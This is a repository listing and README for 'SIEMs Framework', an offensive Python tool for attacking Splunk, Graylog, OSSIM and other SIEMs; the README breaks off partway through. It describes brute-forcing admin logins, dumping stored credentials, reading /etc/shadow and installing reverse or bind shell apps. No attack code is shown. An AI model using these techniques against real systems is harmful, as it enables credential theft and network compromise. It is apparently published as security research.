├── Pipfile ├── Pipfile.lock ├── README.md ├── elasticsiem ├── bruteforcessh.py ├── dict.txt └── sysinfo_elastic.py ├── globals.py ├── graylog ├── alarmcallback.py ├── bruteforcegraylog.py ├── dict.txt ├── obtaincredentialsrestapi.py ├── obtaininputsrestapi.py ├── obtainmongodbcredentials.py └── testcredentialsgraylog.py ├── mcafee ├── bruteforcemcafee.py ├── bruteforcessh.py ├── dict.txt ├── obtainsysteminfo.py ├── obtainuserssystem.py └── obtainwebinfo.py ├── ossim ├── bruteforceossim.py ├── dict.txt ├── maliciousaction.py └── obtainconfigossim.py ├── qradar ├── apikeybruteqradar.py ├── apikeys.txt ├── bruteforceqradar.py ├── dict.txt ├── obtainqradarinfo.py └── userdbqradar.py ├── requirements.txt ├── scanning.py ├── siemonster ├── bfssh_smonster.py ├── dict.txt ├── systeminfo_smonster.py └── usersso_smonster.py ├── siemsframework.py ├── splunk ├── bruteforcesplunk.py ├── bshell.tar.gz ├── dict.txt ├── installshell.py ├── obtainpwds.py ├── obtainsplunkinfo.py ├── obtainsysteminfo.py ├── readfile.py ├── reverse_shell_original.py ├── reverse_shell_win_original.py ├── rshell │ └── default │ │ ├── app.conf │ │ └── inputs.conf ├── testovacredentials.py ├── wadduser.tar.gz ├── wbshell.tar.gz ├── wbshellexe.tar.gz └── wrshell │ └── default │ ├── app.conf │ └── inputs.conf └── test ├── dict.txt ├── scan_mcafee_ssh ├── test_graylog.py ├── test_mcafee.py ├── test_ossim.py ├── test_qradar.py ├── test_scanning.py ├── test_siemonster.py ├── test_siemsframework.py └── test_splunk.py /Pipfile: -------------------------------------------------------------------------------- 1 | [[source]] 2 | name = "pypi" 3 | url = "https://pypi.org/simple" 4 | verify_ssl = true 5 | 6 | [dev-packages] 7 | 8 | [packages] 9 | colorama = "~=0.4.1" 10 | paramiko = "~=2.4.1" 11 | pymongo = "~=3.10.0" 12 | python-nmap = "~=0.6.1" 13 | qradar4py = "~=2.0" 14 | requests = "~=2.19.1" 15 | splunk-sdk = "~=1.6.13" 16 | urllib3 = "~=1.22" 17 | 18 | [requires] 19 | python_version = "3.6" 20 | -------------------------------------------------------------------------------- /Pipfile.lock: -------------------------------------------------------------------------------- 1 | { 2 | "_meta": { 3 | "hash": { 4 | "sha256": "3041397e66920107f7c0fa22a979526afcd8cb9d72f971e57ec6a0bc3bfda804" 5 | }, 6 | "pipfile-spec": 6, 7 | "requires": { 8 | "python_version": "3.6" 9 | }, 10 | "sources": [ 11 | { 12 | "name": "pypi", 13 | "url": "https://pypi.org/simple", 14 | "verify_ssl": true 15 | } 16 | ] 17 | }, 18 | "default": { 19 | "bcrypt": { 20 | "hashes": [ 21 | "sha256:0258f143f3de96b7c14f762c770f5fc56ccd72f8a1857a451c1cd9a655d9ac89", 22 | "sha256:0b0069c752ec14172c5f78208f1863d7ad6755a6fae6fe76ec2c80d13be41e42", 23 | "sha256:19a4b72a6ae5bb467fea018b825f0a7d917789bcfe893e53f15c92805d187294", 24 | "sha256:5432dd7b34107ae8ed6c10a71b4397f1c853bd39a4d6ffa7e35f40584cffd161", 25 | "sha256:6305557019906466fc42dbc53b46da004e72fd7a551c044a827e572c82191752", 26 | "sha256:69361315039878c0680be456640f8705d76cb4a3a3fe1e057e0f261b74be4b31", 27 | "sha256:6fe49a60b25b584e2f4ef175b29d3a83ba63b3a4df1b4c0605b826668d1b6be5", 28 | "sha256:74a015102e877d0ccd02cdeaa18b32aa7273746914a6c5d0456dd442cb65b99c", 29 | "sha256:763669a367869786bb4c8fcf731f4175775a5b43f070f50f46f0b59da45375d0", 30 | "sha256:8b10acde4e1919d6015e1df86d4c217d3b5b01bb7744c36113ea43d529e1c3de", 31 | "sha256:9fe92406c857409b70a38729dbdf6578caf9228de0aef5bc44f859ffe971a39e", 32 | "sha256:a190f2a5dbbdbff4b74e3103cef44344bc30e61255beb27310e2aec407766052", 33 | "sha256:a595c12c618119255c90deb4b046e1ca3bcfad64667c43d1166f2b04bc72db09", 34 | "sha256:c9457fa5c121e94a58d6505cadca8bed1c64444b83b3204928a866ca2e599105", 35 | "sha256:cb93f6b2ab0f6853550b74e051d297c27a638719753eb9ff66d1e4072be67133", 36 | "sha256:ce4e4f0deb51d38b1611a27f330426154f2980e66582dc5f438aad38b5f24fc1", 37 | "sha256:d7bdc26475679dd073ba0ed2766445bb5b20ca4793ca0db32b399dccc6bc84b7", 38 | "sha256:ff032765bb8716d9387fd5376d987a937254b0619eff0972779515b5c98820bc" 39 | ], 40 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 41 | "version": "==3.1.7" 42 | }, 43 | "certifi": { 44 | "hashes": [ 45 | "sha256:5ad7e9a056d25ffa5082862e36f119f7f7cec6457fa07ee2f8c339814b80c9b1", 46 | "sha256:9cd41137dc19af6a5e03b630eefe7d1f458d964d406342dd3edf625839b944cc" 47 | ], 48 | "version": "==2020.4.5.2" 49 | }, 50 | "cffi": { 51 | "hashes": [ 52 | "sha256:001bf3242a1bb04d985d63e138230802c6c8d4db3668fb545fb5005ddf5bb5ff", 53 | "sha256:00789914be39dffba161cfc5be31b55775de5ba2235fe49aa28c148236c4e06b", 54 | "sha256:028a579fc9aed3af38f4892bdcc7390508adabc30c6af4a6e4f611b0c680e6ac", 55 | "sha256:14491a910663bf9f13ddf2bc8f60562d6bc5315c1f09c704937ef17293fb85b0", 56 | "sha256:1cae98a7054b5c9391eb3249b86e0e99ab1e02bb0cc0575da191aedadbdf4384", 57 | "sha256:2089ed025da3919d2e75a4d963d008330c96751127dd6f73c8dc0c65041b4c26", 58 | "sha256:2d384f4a127a15ba701207f7639d94106693b6cd64173d6c8988e2c25f3ac2b6", 59 | "sha256:337d448e5a725bba2d8293c48d9353fc68d0e9e4088d62a9571def317797522b", 60 | "sha256:399aed636c7d3749bbed55bc907c3288cb43c65c4389964ad5ff849b6370603e", 61 | "sha256:3b911c2dbd4f423b4c4fcca138cadde747abdb20d196c4a48708b8a2d32b16dd", 62 | "sha256:3d311bcc4a41408cf5854f06ef2c5cab88f9fded37a3b95936c9879c1640d4c2", 63 | "sha256:62ae9af2d069ea2698bf536dcfe1e4eed9090211dbaafeeedf5cb6c41b352f66", 64 | "sha256:66e41db66b47d0d8672d8ed2708ba91b2f2524ece3dee48b5dfb36be8c2f21dc", 65 | "sha256:675686925a9fb403edba0114db74e741d8181683dcf216be697d208857e04ca8", 66 | "sha256:7e63cbcf2429a8dbfe48dcc2322d5f2220b77b2e17b7ba023d6166d84655da55", 67 | "sha256:8a6c688fefb4e1cd56feb6c511984a6c4f7ec7d2a1ff31a10254f3c817054ae4", 68 | "sha256:8c0ffc886aea5df6a1762d0019e9cb05f825d0eec1f520c51be9d198701daee5", 69 | "sha256:95cd16d3dee553f882540c1ffe331d085c9e629499ceadfbda4d4fde635f4b7d", 70 | "sha256:99f748a7e71ff382613b4e1acc0ac83bf7ad167fb3802e35e90d9763daba4d78", 71 | "sha256:b8c78301cefcf5fd914aad35d3c04c2b21ce8629b5e4f4e45ae6812e461910fa", 72 | "sha256:c420917b188a5582a56d8b93bdd8e0f6eca08c84ff623a4c16e809152cd35793", 73 | "sha256:c43866529f2f06fe0edc6246eb4faa34f03fe88b64a0a9a942561c8e22f4b71f", 74 | "sha256:cab50b8c2250b46fe738c77dbd25ce017d5e6fb35d3407606e7a4180656a5a6a", 75 | "sha256:cef128cb4d5e0b3493f058f10ce32365972c554572ff821e175dbc6f8ff6924f", 76 | "sha256:cf16e3cf6c0a5fdd9bc10c21687e19d29ad1fe863372b5543deaec1039581a30", 77 | "sha256:e56c744aa6ff427a607763346e4170629caf7e48ead6921745986db3692f987f", 78 | "sha256:e577934fc5f8779c554639376beeaa5657d54349096ef24abe8c74c5d9c117c3", 79 | "sha256:f2b0fa0c01d8a0c7483afd9f31d7ecf2d71760ca24499c8697aeb5ca37dc090c" 80 | ], 81 | "version": "==1.14.0" 82 | }, 83 | "chardet": { 84 | "hashes": [ 85 | "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae", 86 | "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691" 87 | ], 88 | "version": "==3.0.4" 89 | }, 90 | "colorama": { 91 | "hashes": [ 92 | "sha256:7d73d2a99753107a36ac6b455ee49046802e59d9d076ef8e47b61499fa29afff", 93 | "sha256:e96da0d330793e2cb9485e9ddfd918d456036c7149416295932478192f4436a1" 94 | ], 95 | "index": "pypi", 96 | "version": "==0.4.3" 97 | }, 98 | "cryptography": { 99 | "hashes": [ 100 | "sha256:091d31c42f444c6f519485ed528d8b451d1a0c7bf30e8ca583a0cac44b8a0df6", 101 | "sha256:18452582a3c85b96014b45686af264563e3e5d99d226589f057ace56196ec78b", 102 | "sha256:1dfa985f62b137909496e7fc182dac687206d8d089dd03eaeb28ae16eec8e7d5", 103 | "sha256:1e4014639d3d73fbc5ceff206049c5a9a849cefd106a49fa7aaaa25cc0ce35cf", 104 | "sha256:22e91636a51170df0ae4dcbd250d318fd28c9f491c4e50b625a49964b24fe46e", 105 | "sha256:3b3eba865ea2754738616f87292b7f29448aec342a7c720956f8083d252bf28b", 106 | "sha256:651448cd2e3a6bc2bb76c3663785133c40d5e1a8c1a9c5429e4354201c6024ae", 107 | "sha256:726086c17f94747cedbee6efa77e99ae170caebeb1116353c6cf0ab67ea6829b", 108 | "sha256:844a76bc04472e5135b909da6aed84360f522ff5dfa47f93e3dd2a0b84a89fa0", 109 | "sha256:88c881dd5a147e08d1bdcf2315c04972381d026cdb803325c03fe2b4a8ed858b", 110 | "sha256:96c080ae7118c10fcbe6229ab43eb8b090fccd31a09ef55f83f690d1ef619a1d", 111 | "sha256:a0c30272fb4ddda5f5ffc1089d7405b7a71b0b0f51993cb4e5dbb4590b2fc229", 112 | "sha256:bb1f0281887d89617b4c68e8db9a2c42b9efebf2702a3c5bf70599421a8623e3", 113 | "sha256:c447cf087cf2dbddc1add6987bbe2f767ed5317adb2d08af940db517dd704365", 114 | "sha256:c4fd17d92e9d55b84707f4fd09992081ba872d1a0c610c109c18e062e06a2e55", 115 | "sha256:d0d5aeaedd29be304848f1c5059074a740fa9f6f26b84c5b63e8b29e73dfc270", 116 | "sha256:daf54a4b07d67ad437ff239c8a4080cfd1cc7213df57d33c97de7b4738048d5e", 117 | "sha256:e993468c859d084d5579e2ebee101de8f5a27ce8e2159959b6673b418fd8c785", 118 | "sha256:f118a95c7480f5be0df8afeb9a11bd199aa20afab7a96bcf20409b411a3a85f0" 119 | ], 120 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", 121 | "version": "==2.9.2" 122 | }, 123 | "idna": { 124 | "hashes": [ 125 | "sha256:156a6814fb5ac1fc6850fb002e0852d56c0c8d2531923a51032d1b70760e186e", 126 | "sha256:684a38a6f903c1d71d6d5fac066b58d7768af4de2b832e426ec79c30daa94a16" 127 | ], 128 | "version": "==2.7" 129 | }, 130 | "paramiko": { 131 | "hashes": [ 132 | "sha256:34fb64705ba3d1d5cd20b4fda16377b5ea3c84f5d74356543ecf2263c7fbc9b8", 133 | "sha256:c6de454b3be8d35100d95d62b8073e429ed35326d574649f173c0acf7d72b2eb" 134 | ], 135 | "index": "pypi", 136 | "version": "==2.4.3" 137 | }, 138 | "pyasn1": { 139 | "hashes": [ 140 | "sha256:014c0e9976956a08139dc0712ae195324a75e142284d5f87f1a87ee1b068a359", 141 | "sha256:03840c999ba71680a131cfaee6fab142e1ed9bbd9c693e285cc6aca0d555e576", 142 | "sha256:0458773cfe65b153891ac249bcf1b5f8f320b7c2ce462151f8fa74de8934becf", 143 | "sha256:08c3c53b75eaa48d71cf8c710312316392ed40899cb34710d092e96745a358b7", 144 | "sha256:39c7e2ec30515947ff4e87fb6f456dfc6e84857d34be479c9d4a4ba4bf46aa5d", 145 | "sha256:5c9414dcfede6e441f7e8f81b43b34e834731003427e5b09e4e00e3172a10f00", 146 | "sha256:6e7545f1a61025a4e58bb336952c5061697da694db1cae97b116e9c46abcf7c8", 147 | "sha256:78fa6da68ed2727915c4767bb386ab32cdba863caa7dbe473eaae45f9959da86", 148 | "sha256:7ab8a544af125fb704feadb008c99a88805126fb525280b2270bb25cc1d78a12", 149 | "sha256:99fcc3c8d804d1bc6d9a099921e39d827026409a58f2a720dcdb89374ea0c776", 150 | "sha256:aef77c9fb94a3ac588e87841208bdec464471d9871bd5050a287cc9a475cd0ba", 151 | "sha256:e89bf84b5437b532b0803ba5c9a5e054d21fec423a89952a74f87fa2c9b7bce2", 152 | "sha256:fec3e9d8e36808a28efb59b489e4528c10ad0f480e57dcc32b4de5c9d8c9fdf3" 153 | ], 154 | "version": "==0.4.8" 155 | }, 156 | "pycparser": { 157 | "hashes": [ 158 | "sha256:2d475327684562c3a96cc71adf7dc8c4f0565175cf86b6d7a404ff4c771f15f0", 159 | "sha256:7582ad22678f0fcd81102833f60ef8d0e57288b6b5fb00323d101be910e35705" 160 | ], 161 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 162 | "version": "==2.20" 163 | }, 164 | "pymongo": { 165 | "hashes": [ 166 | "sha256:01b4e10027aef5bb9ecefbc26f5df3368ce34aef81df43850f701e716e3fe16d", 167 | "sha256:0fc5aa1b1acf7f61af46fe0414e6a4d0c234b339db4c03a63da48599acf1cbfc", 168 | "sha256:1396eb7151e0558b1f817e4b9d7697d5599e5c40d839a9f7270bd90af994ad82", 169 | "sha256:18e84a3ec5e73adcb4187b8e5541b2ad61d716026ed9863267e650300d8bea33", 170 | "sha256:19adf2848b80cb349b9891cc854581bbf24c338be9a3260e73159bdeb2264464", 171 | "sha256:20ee0475aa2ba437b0a14806f125d696f90a8433d820fb558fdd6f052acde103", 172 | "sha256:26798795097bdeb571f13942beef7e0b60125397811c75b7aa9214d89880dd1d", 173 | "sha256:26e707a4eb851ec27bb969b5f1413b9b2eac28fe34271fa72329100317ea7c73", 174 | "sha256:2a3c7ad01553b27ec553688a1e6445e7f40355fb37d925c11fcb50b504e367f8", 175 | "sha256:2f07b27dbf303ea53f4147a7922ce91a26b34a0011131471d8aaf73151fdee9a", 176 | "sha256:316f0cf543013d0c085e15a2c8abe0db70f93c9722c0f99b6f3318ff69477d70", 177 | "sha256:31d11a600eea0c60de22c8bdcb58cda63c762891facdcb74248c36713240987f", 178 | "sha256:334ef3ffd0df87ea83a0054454336159f8ad9c1b389e19c0032d9cb8410660e6", 179 | "sha256:358ba4693c01022d507b96a980ded855a32dbdccc3c9331d0667be5e967f30ed", 180 | "sha256:3a6568bc53103df260f5c7d2da36dffc5202b9a36c85540bba1836a774943794", 181 | "sha256:444bf2f44264578c4085bb04493bfed0e5c1b4fe7c2704504d769f955cc78fe4", 182 | "sha256:47a00b22c52ee59dffc2aad02d0bbfb20c26ec5b8de8900492bf13ad6901cf35", 183 | "sha256:4c067db43b331fc709080d441cb2e157114fec60749667d12186cc3fc8e7a951", 184 | "sha256:4c092310f804a5d45a1bcaa4191d6d016c457b6ed3982a622c35f729ff1c7f6b", 185 | "sha256:53b711b33134e292ef8499835a3df10909c58df53a2a0308f598c432e9a62892", 186 | "sha256:568d6bee70652d8a5af1cd3eec48b4ca1696fb1773b80719ebbd2925b72cb8f6", 187 | "sha256:56fa55032782b7f8e0bf6956420d11e2d4e9860598dfe9c504edec53af0fc372", 188 | "sha256:5a2c492680c61b440272341294172fa3b3751797b1ab983533a770e4fb0a67ac", 189 | "sha256:61235cc39b5b2f593086d1d38f3fc130b2d125bd8fc8621d35bc5b6bdeb92bd2", 190 | "sha256:619ac9aaf681434b4d4718d1b31aa2f0fce64f2b3f8435688fcbdc0c818b6c54", 191 | "sha256:6238ac1f483494011abde5286282afdfacd8926659e222ba9b74c67008d3a58c", 192 | "sha256:63752a72ca4d4e1386278bd43d14232f51718b409e7ac86bcf8810826b531113", 193 | "sha256:6fdc5ccb43864065d40dd838437952e9e3da9821b7eac605ba46ada77f846bdf", 194 | "sha256:7abc3a6825a346fa4621a6f63e3b662bbb9e0f6ffc32d30a459d695f20fb1a8b", 195 | "sha256:7aef381bb9ae8a3821abd7f9d4d93978dbd99072b48522e181baeffcd95b56ae", 196 | "sha256:80df3caf251fe61a3f0c9614adc6e2bfcffd1cd3345280896766712fb4b4d6d7", 197 | "sha256:95f970f34b59987dee6f360d2e7d30e181d58957b85dff929eee4423739bd151", 198 | "sha256:993257f6ca3cde55332af1f62af3e04ca89ce63c08b56a387cdd46136c72f2fa", 199 | "sha256:9c0a57390549affc2b5dda24a38de03a5c7cbc58750cd161ff5d106c3c6eec80", 200 | "sha256:a0794e987d55d2f719cc95fcf980fc62d12b80e287e6a761c4be14c60bd9fecc", 201 | "sha256:a3b98121e68bf370dd8ea09df67e916f93ea95b52fc010902312168c4d1aff5d", 202 | "sha256:a60756d55f0887023b3899e6c2923ba5f0042fb11b1d17810b4e07395404f33e", 203 | "sha256:a676bd2fbc2309092b9bbb0083d35718b5420af3a42135ebb1e4c3633f56604d", 204 | "sha256:a732838c78554c1257ff2492f5c8c4c7312d0aecd7f732149e255f3749edd5ee", 205 | "sha256:ad3dc88dfe61f0f1f9b99c6bc833ea2f45203a937a18f0d2faa57c6952656012", 206 | "sha256:ae65d65fde4135ef423a2608587c9ef585a3551fc2e4e431e7c7e527047581be", 207 | "sha256:b070a4f064a9edb70f921bfdc270725cff7a78c22036dd37a767c51393fb956f", 208 | "sha256:b6da85949aa91e9f8c521681344bd2e163de894a5492337fba8b05c409225a4f", 209 | "sha256:bbf47110765b2a999803a7de457567389253f8670f7daafb98e059c899ce9764", 210 | "sha256:bd9c1e6f92b4888ae3ef7ae23262c513b962f09f3fb3b48581dde5df7d7a860a", 211 | "sha256:c06b3f998d2d7160db58db69adfb807d2ec307e883e2f17f6b87a1ef6c723f11", 212 | "sha256:c318fb70542be16d3d4063cde6010b1e4d328993a793529c15a619251f517c39", 213 | "sha256:c4aef42e5fa4c9d5a99f751fb79caa880dac7eaf8a65121549318b984676a1b7", 214 | "sha256:c9ca545e93a9c2a3bdaa2e6e21f7a43267ff0813e8055adf2b591c13164c0c57", 215 | "sha256:da2c3220eb55c4239dd8b982e213da0b79023cac59fe54ca09365f2bc7e4ad32", 216 | "sha256:dd8055da300535eefd446b30995c0813cc4394873c9509323762a93e97c04c03", 217 | "sha256:e2b46e092ea54b732d98c476720386ff2ccd126de1e52076b470b117bff7e409", 218 | "sha256:e334c4f39a2863a239d38b5829e442a87f241a92da9941861ee6ec5d6380b7fe", 219 | "sha256:e5c54f04ca42bbb5153aec5d4f2e3d9f81e316945220ac318abd4083308143f5", 220 | "sha256:f4d06764a06b137e48db6d569dc95614d9d225c89842c885669ee8abc9f28c7a", 221 | "sha256:f96333f9d2517c752c20a35ff95de5fc2763ac8cdb1653df0f6f45d281620606" 222 | ], 223 | "index": "pypi", 224 | "version": "==3.10.1" 225 | }, 226 | "pynacl": { 227 | "hashes": [ 228 | "sha256:06cbb4d9b2c4bd3c8dc0d267416aaed79906e7b33f114ddbf0911969794b1cc4", 229 | "sha256:11335f09060af52c97137d4ac54285bcb7df0cef29014a1a4efe64ac065434c4", 230 | "sha256:2fe0fc5a2480361dcaf4e6e7cea00e078fcda07ba45f811b167e3f99e8cff574", 231 | "sha256:30f9b96db44e09b3304f9ea95079b1b7316b2b4f3744fe3aaecccd95d547063d", 232 | "sha256:511d269ee845037b95c9781aa702f90ccc36036f95d0f31373a6a79bd8242e25", 233 | "sha256:537a7ccbea22905a0ab36ea58577b39d1fa9b1884869d173b5cf111f006f689f", 234 | "sha256:54e9a2c849c742006516ad56a88f5c74bf2ce92c9f67435187c3c5953b346505", 235 | "sha256:757250ddb3bff1eecd7e41e65f7f833a8405fede0194319f87899690624f2122", 236 | "sha256:7757ae33dae81c300487591c68790dfb5145c7d03324000433d9a2c141f82af7", 237 | "sha256:7c6092102219f59ff29788860ccb021e80fffd953920c4a8653889c029b2d420", 238 | "sha256:8122ba5f2a2169ca5da936b2e5a511740ffb73979381b4229d9188f6dcb22f1f", 239 | "sha256:9c4a7ea4fb81536c1b1f5cc44d54a296f96ae78c1ebd2311bd0b60be45a48d96", 240 | "sha256:cd401ccbc2a249a47a3a1724c2918fcd04be1f7b54eb2a5a71ff915db0ac51c6", 241 | "sha256:d452a6746f0a7e11121e64625109bc4468fc3100452817001dbe018bb8b08514", 242 | "sha256:ea6841bc3a76fa4942ce00f3bda7d436fda21e2d91602b9e21b7ca9ecab8f3ff", 243 | "sha256:f8851ab9041756003119368c1e6cd0b9c631f46d686b3904b18c0139f4419f80" 244 | ], 245 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 246 | "version": "==1.4.0" 247 | }, 248 | "python-nmap": { 249 | "hashes": [ 250 | "sha256:80ba0eb10a52283a54a633f40b5baa9c2ff08675d6621dd089ead942852f5bd3" 251 | ], 252 | "index": "pypi", 253 | "version": "==0.6.1" 254 | }, 255 | "qradar4py": { 256 | "hashes": [ 257 | "sha256:0b812c7810f6f69dd35b180816c01e23a0363aee2d1c7c5537d6231c0652b731", 258 | "sha256:3835c81f7b92b6f09eb11cd7c8cfa50cd0b41d206d6486301037b9f607a6adfe" 259 | ], 260 | "index": "pypi", 261 | "version": "==2.0" 262 | }, 263 | "requests": { 264 | "hashes": [ 265 | "sha256:63b52e3c866428a224f97cab011de738c36aec0185aa91cfacd418b5d58911d1", 266 | "sha256:ec22d826a36ed72a7358ff3fe56cbd4ba69dd7a6718ffd450ff0e9df7a47ce6a" 267 | ], 268 | "index": "pypi", 269 | "version": "==2.19.1" 270 | }, 271 | "six": { 272 | "hashes": [ 273 | "sha256:30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259", 274 | "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" 275 | ], 276 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 277 | "version": "==1.15.0" 278 | }, 279 | "splunk-sdk": { 280 | "hashes": [ 281 | "sha256:e2242b02a3c9bd0713829ce046200802462eb67bf413e0086dc04c15bde31a11", 282 | "sha256:f2968cd650b72e2831abe5e4b86e347d476dc82b787aeecaaa5da37bd1a16ae7" 283 | ], 284 | "index": "pypi", 285 | "version": "==1.6.13" 286 | }, 287 | "urllib3": { 288 | "hashes": [ 289 | "sha256:a68ac5e15e76e7e5dd2b8f94007233e01effe3e50e8daddf69acfd81cb686baf", 290 | "sha256:b5725a0bd4ba422ab0e66e89e030c806576753ea3ee08554382c14e685d117b5" 291 | ], 292 | "index": "pypi", 293 | "version": "==1.23" 294 | } 295 | }, 296 | "develop": {} 297 | } 298 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SIEMS FRAMEWORK 2 | 3 | MultiSIEM Modular Python3 Attack Framework 4 | By ElevenPaths https://www.elevenpaths.com/ 5 | Usage: python3 ./siemsframework.py 6 | 7 | ## INTRODUCTION 8 | 9 | SIEMs are defensive tools increasingly used in the field of cybersecurity, especially by major companies and companies intended to monitor highly critical systems and networks. However, from the point of view of an attacker, those permissions granted to SIEMs on systems and accounts from corporate networks are high. Moreover, administrative access to SIEMs may be used to obtain code execution on the server where such SIEM is installed, and sometimes also on client machines, considering that a SIEM collects events such as Active Directory servers, AWS servers, Data Bases and network devices (for example, Firewalls and Routers). 10 | 11 | During our investigation, we detected a great amount of attack vectors that might be used on the various SIEMs to compromise them, for instance: 12 | 13 | • Obtain user accounts and passwords stored in the SIEM from critical systems (LDAP/AD servers, databases, network devices, AWS servers). 14 | 15 | • Develop and install malicious applications such as Windows/Linux reverse shells, Windows/Linux bind shells or malicious scripts with the aim of compromising the server where the SIEM is installed. 16 | 17 | • Develop and install malicious applications such as Windows/Linux reverse shells, Windows/Linux bind shells or malicious scripts with the aim of compromising the machines from which the SIEM collects events. 18 | 19 | • Create and apply malicious actions or notifications that allow to execute commands when a given event occurs, for example with the purpose of obtaining a reverse shell on the server where the SIEM is installed. 20 | 21 | • Take advantage of default passwords and SIEM weaknesses in the OVA images configuration to obtain admin credentials of the server, database or even the SIEM web interface itself. 22 | 23 | • Perform dictionary attacks or brute-force attacks against the web or admin interface, or against the SIEM client software, to obtain admin credentials. 24 | 25 | • Read arbitrary files from the server where the SIEM is installed. 26 | 27 | • Obtain SIEM configuration information and other relevant parameters to perform further attacks. 28 | 29 | On the basis of the investigation results, the tool Open Source SIEMs Framework was developed. It is a modular tool developed in Python3 by the Innovation and Laboratory team of ElevenPaths. It allows to automatize potential attacks to various SIEMs existing in the market (both commercial and open source). 30 | 31 | SIEMs Framework supports multiple attack payloads that may be selected according the SIEM to be attacked and its operating system. There are payloads available in PowerShell, Python, Bash, Exe, and more formats. Once the selected attack is executed, the tool shows the results on the screen and it is possible to return and execute any other attack on the same SIEM or select other SIEM to compromise. It has a simple, easy-to-use and intuitive interface. Currently it can be used with the following SIEMs: Splunk, Graylog and OSSIM. 32 | 33 | ## DOWNLOADING, REQUIREMENTS AND INSTALLATION 34 | 35 | SIEMs Framework can be downloaded from our Github by downloading the .zip file or cloning the repository, and presents the following requirements that can be installed through pip3 install -r requirements.txt: 36 | 37 | • splunk-sdk 38 | 39 | • requests 40 | 41 | • python-nmap 42 | 43 | • colorama 44 | 45 | • pandas 46 | 47 | • paramiko 48 | 49 | • pymongo 50 | 51 | • qradar4py 52 | 53 | • requests_mock 54 | 55 | • urllib3 56 | 57 | Once the requirements installed, the tool can be used as follows: python3 ./siemsframework.py 58 | 59 | ## TOOL USAGE 60 | 61 | When the tool is executed, the main menu is displayed, and there you must select if you wish to scan a specific IP where there would be a SIEM or a network to detect those SIEMs within it. For scanning and detecting the SIEM within a specific IP address you must use option 1, and for scanning the network option 2. 62 | 63 | ### Scanning a specific IP 64 | By selecting option 1 “Scan and Detect SIEM”, the tool requests the IP address to be able to scan the specific ports of the SIEMs supported and connect to either web or management interface in order to verify that it is really a SIEM. 65 | 66 | Once the SIEM has been detected by following the above methods, the tool shows the SIEM detected in red and gives you the option to launch the attack module of that SIEM. 67 | 68 | ### Network Scanning 69 | By selecting option 2 “Find SIEMs on the network” the tool requests the network to be scanned in CIDR notation, for instance: 192.168.137.0/24. Once the information is entered, SIEMs Framework performs firstly a discovery to detect the active systems; then, default ports of the SIEMs supported are scanned, and finally it connects to either web or management interface of each of those systems in order to verify that it is really a SIEM. 70 | 71 | Once the SIEMs have been detected by following the above methods, the tool shows the SIEMs detected in red and requests the IP address of the SIEM to be attacked. 72 | 73 | 74 | ### Splunk Attack Modules 75 | 76 | By entering “y” and selecting the launch of Splunk attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first two attacks no credentials are required, but for the fifth one Splunk admin privileges are needed. 77 | 78 | #### 1st Attack: Dictionary Attack on Splunk Admin Interface 79 | This attack module contains a specific dictionary for Splunk named dict.txt, which is made up of the 100 most used password over 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /splunk/dict.txt can be replaced with any other word list, provided that the file name is kept. Splunk password policy does not apply to users with admin role, so restrictions concerning password or account blocking due to unsuccessful access attempts do not apply. 80 | Prior to starting the dictionary attack, the tool verifies if the Splunk to be analyzed has the Free version that does not use any type of authentication, or if it still keeps the default password “changeme” of the oldest versions of this software: 81 | 82 | #### 2nd Attack: Obtain Server and Session Information via Web Interface 83 | In case the Splunk server to be analyzed has the web interface active, this module allows to obtain server and session information from the web interface itself without needing to authenticate. 8000 is the default port of Splunk web interface; to use this module it is necessary to know and enter the port where the web interface is published. 84 | 85 | #### 3rd Attack: Obtain System Information via Management Port 86 | This module can be used on Splunk Server or Universal Forwarder. To use it, Splunk Admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The result of the module is the information of the current Splunk installation: version, operating system, Splunk configurations and more. 87 | 88 | #### 4th Attack: Obtain Splunk Stored Passwords 89 | This module is only used on Splunk servers. To use it, Splunk admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The result of the module are all the credentials stored by those apps used on Splunk to connect to those devices from which events are obtained. 90 | 91 | #### 5th Attack: Read /etc/shadow file from Splunk server (Linux only) 92 | This module can be used on Linux Splunk Server. To use it, Splunk admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The module uses an index to load the file concerned, and its result is the content of the file /etc/shadow from the server where Splunk is installed. 93 | 94 | #### 6th Attack: Deployment of Malicious Applications to UF 95 | This module will be available in the next version of SIEMs Framework. In order to compromise Universal Forwarders, attack 1 to obtain credentials and then attack 7 to install malicious applications depending on the platform may be performed so far. 96 | #### 7th Attack: Install Malicious Application to Compromise Splunk/UF Server 97 | This attack module allows to develop and install on Splunk a malicious application designed to compromise the system concerned. Firstly, the type of payload to be used according to the operating system and the type of Splunk to attack must be selected (Splunk Server or Universal Forwarder). You can use Linux Python Reverse or Bind Shell for Splunk Server or UF; Windows Python Reverse or Bind Shell for Splunk Server (where Python is installed by default); and Executable Bind Shell or a script to add an admin user on Windows Universal Forwarders (where Python is not installed by default). Then, username, Splunk admin password and the attacker’s IP address must be entered. 98 | 99 | 100 | ### Graylog Attack Modules 101 | 102 | By entering “y” and selecting the launch of Graylog attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first three attacks no credentials are required, but for the fourth one Graylog admin privileges are needed. 103 | 104 | #### 1st Attack: Dictionary Attack on Graylog Web Interface 105 | This attack module contains a specific dictionary for Graylog named dict.txt, which is made up of the 100 most used password over 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /graylog/dict.txt can be replaced with any other word list, provided that the file name is 